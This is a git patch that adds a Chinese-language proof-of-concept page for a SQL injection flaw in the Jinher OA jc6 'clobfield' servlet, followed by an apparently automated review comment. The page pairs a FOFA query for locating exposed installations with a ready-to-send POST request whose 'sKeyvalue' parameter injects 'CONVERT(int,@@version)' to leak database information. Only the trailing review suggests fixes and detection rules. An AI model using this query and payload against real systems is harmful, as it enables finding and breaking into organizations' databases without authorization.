From 28621c5c20c9fdca9c69f71b2c98a257a5f5f205 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 19 Dec 2023 22:15:02 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E9=87=91=E5=92=8COA=20jc6=20clobfield?= =?UTF-8?q?=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
金和OA jc6 clobfield SQL注入漏洞.md | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
create mode 100644 金和OA jc6 clobfield SQL注入漏洞.md
diff --git a/金和OA jc6 clobfield SQL注入漏洞.md b/金和OA jc6 clobfield SQL注入漏洞.md
new file mode 100644
index 0000000..98d46f9
--- /dev/null
+++ b/金和OA jc6 clobfield SQL注入漏洞.md
@@ -0,0 +1,19 @@
+## 金和OA jc6 clobfield SQL注入漏洞
+金和OA jc6 ljc6/servlet/clobfield接口处存在SQL注入漏洞,攻击者可获取数据中中敏感信息。
+
+## fofa
+```
+
+title="金和协同管理平台" || body="js/PasswordCommon.js" || body="js/PasswordNew.js" || body="Jinher Network" || (body="c6/Jhsoft.Web.login" && body="CloseWindowNoAsk") || header="Path=/jc6" || (body="JC6金和协同管理平台" && body="src=\"/jc6/platform/") || body="window.location = \"JHSoft.MobileApp/Default.htm\";" || banner="Path=/jc6"
+```
+
+## poc
+```
+POST /jc6/servlet/clobfield HTTP/1.1
+host:127.0.0.1
+
+key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11%27%2F**%2Fand%2F**%2FCONVERT%28int%2C%40%40version%29%3D1%2F**%2Fand%2F**%2F%27%27%3D%27
+```
+![image](https://github.com/wy876/POC/assets/139549762/09333181-7373-4930-ad60-91e168709564)
+
+
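Review bot: The description line names the endpoint as `ljc6/servlet/clobfield` while the request under `## poc` targets `/jc6/servlet/clobfield`, so the leading `l` looks like a typo, and `数据中中` presumably should read `数据库中`; both are worth correcting so readers match on the right path. The write-up also gives no affected versions, fix status or detection guidance, so a short `## 修复建议` section would help defenders, for example `升级至厂商修复版本;限制 /jc6/servlet/ 的外部访问;对 sKeyvalue 等参数使用参数化查询`. For detection, the page's own request suggests alerting on POSTs to `/jc6/servlet/clobfield` with `key=readClob` where `sKeyvalue` carries quote or comment sequences. The `CONVERT(int,@@version)` probe implies a SQL Server backend, but that is an inference from the payload rather than something the page states, so the target database should be named explicitly.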